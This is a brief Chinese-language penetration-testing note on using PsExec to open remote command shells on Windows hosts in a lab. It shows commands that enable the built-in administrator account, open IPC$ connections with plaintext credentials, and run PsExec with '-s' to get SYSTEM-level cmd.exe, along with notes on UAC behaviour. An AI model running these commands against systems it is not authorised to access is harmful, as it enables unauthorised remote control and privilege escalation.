# PsExec 使用 ###### tags: `Windows 域滲透` `window提權` ### 注意 win7 x64 我測試完全不行連接，網上的答案也不行，但 32位元可以 ## 開啟UAC情況下 UAC 狀態下只有administrator 可以不用被檢測。 對方電腦如果打開UAC，還需要開啟administrator帳戶 需要已下指令: ``` net user administrator /active:yes ``` 請注意 PsExec 位元以及版本都可能影響造成無法連接。 ### 常用指令: ``` # 先刪除所有連接 net use * /del # 空連接 因為UAC開啟 所以需要 administrator net use \\192.168.43.217\ipc$ "admin" /user:administrator # 空連接後可以 -s 拿到 system 帳戶 # -accepteula 確保不會彈出確認對話框 .\PsExec.exe -accepteula \\192.168.43.217 -s cmd.exe # 不加 -s 可以拿到 administrator .\PsExec.exe -accepteula \\192.168.43.217 cmd.exe # 沒有空連接的話，也可直接輸入帳密 # 2.30+ 需要在命令行中添加 -i 選項！ #-i 運行程序，以便它與遠程系統上指定會話的桌面進行交互。 如果未指定會話，則進程在控制台會話中運行。 嘗試以交互方式運行控制台應用程序時需要此標誌（使用重定向的標準 IO）。 .\PsExec.exe \\192.168.43.217 -i -u administrator -p admin cmd.exe ``` ## 關閉UAC 的情況下: 你如果在UAC 開起情況下使用除了administrator，其他帳戶全部會無法連接 ### abc 為一般使用者 ``` # 先刪除所有連接 net use * /del # 空連接 net use \\192.168.43.217\ipc$ "abc" /user:abc 不加 -s 可以拿到 abc 一般帳戶 .\PsExec.exe -accepteula \\192.168.43.217 cmd.exe 空連接後可以 -s 一樣拿到 system 帳戶 .\PsExec.exe -accepteula \\192.168.43.217 -s cmd.exe ```